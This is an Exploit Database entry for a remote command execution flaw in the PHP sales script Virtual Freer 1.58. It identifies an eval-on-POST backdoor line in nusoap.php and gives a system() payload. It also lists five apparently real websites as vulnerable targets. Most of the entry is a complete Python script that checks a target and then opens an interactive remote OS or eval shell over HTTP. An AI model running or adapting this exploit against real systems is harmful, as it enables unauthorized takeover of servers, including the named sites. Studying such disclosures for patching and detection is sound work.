Virtual Freer 1.58 – Remote Command Execution

• Exploit Database
• 17 阅读

• 作者： SajjadBnd
  日期： 2020-02-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48094/

• # Exploit title : Virtual Freer 1.58 - Remote Command Execution
  # Exploit Author : SajjadBnd
  # Date : 2020-02-17
  # Vendor Homepage : http://freer.ir/virtual/
  # Software Link : http://www.freer.ir/virtual/download.php?action=get
  # Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip
  # Tested on : Ubuntu 19.10
  # Version : 1.58
  ############################
  # [ DESCRIPTION ]
  #
  # Free Script For Sell Charging Cards and Virtual Products
  #
  # [POC]
  #
  # Vulnerable file:/include/libs/nusoap.php
  # 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']);
  #
  # POST /include/libs/nusoap.php
  # payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
  #
  # [ Sample Vulnerable Sites ]
  #
  # http://3cure.ir/buy/
  # http://cheapcharger.ir/
  # http://www.appraworld.ir/
  # http://latoon.ir/
  # http://novinv.ir/
  #
  
  import requests
  import os
  import sys
  
  def clear():
  linux = 'clear'
  windows = 'cls'
  os.system([linux, windows][os.name == 'nt'])
  
  def Banner():
  print '''
  #################################################
  # #
  # Virtual Freer 1.58 - Remote Command Execution #
  #SajjadBnd#
  #		 BiskooitPedar		#
  #		blackwolf@post.com		#
  #################################################
  '''
  
  def inputs():
  target = raw_input('[*] URL : ')
  while True:
  	try:
  r = requests.get(target,verify=False)
  start(target)
  except requests.exceptions.MissingSchema:
  	target = "http://" + target
  
  def start(target):
  print "======================\n\n[!] Checking: ****()"
  url = '%s/include/libs/nusoap.php' % (target)
  body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'}
  r = requests.post(url,data=body,allow_redirects=False,timeout=50)
  content = r.text.encode('utf-8')
  if 'vulnerable' in content:
  print "[+] vulnerable: ****()\n"
  else:
  print "[-] Target not Vulnerable!"
  	sys.exit(1)
  print "\n[!] Checking: System()"
  body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'}
  r = requests.post(url,data=body,allow_redirects=False,timeout=50)
  content = r.text.decode('utf-8')
  if 'gid' in content:
  print "[+] vulnerable: system()\n"
  	osshell(url)
  else:
  print "[-] Target not Vulnerable to Running OS Commands!"
  	evalshell(url)
  
  def osshell(url):
  print "======================\n[+] You can run os commands :D\n"
  while True:
  	try:
  cmd = raw_input('OS_SHELL $ ')
  command = "system('%s');" % (cmd)
  body = {'a74ad8dfacd4f985eb3977517615ce25':command}
  r = requests.post(url,data=body,allow_redirects=False,timeout=50)
  content = r.text.encode('utf-8')
  print "\n",content
  except KeyboardInterrupt:
  print "\n____________________\n[+] GoodBye :D"
  sys.exit(1)
  
  def evalshell(url):
  print "======================\n[+] You can just run Eval Commands :D\n"
  while True:
  	try:
  cmd = raw_input('\nEval()=> ')
  command = '%s;' % (cmd)
  body = {'a74ad8dfacd4f985eb3977517615ce25':command}
  r = requests.post(url,data=body,allow_redirects=False,timeout=50)
  content = r.text.encode('utf-8')
  print "\n",content
  except KeyboardInterrupt:
  print "\n____________________\n[+] ok! GoodBye :D"
  sys.exit(1)
  
  if __name__ == '__main__':
  clear()
  Banner()
  	inputs()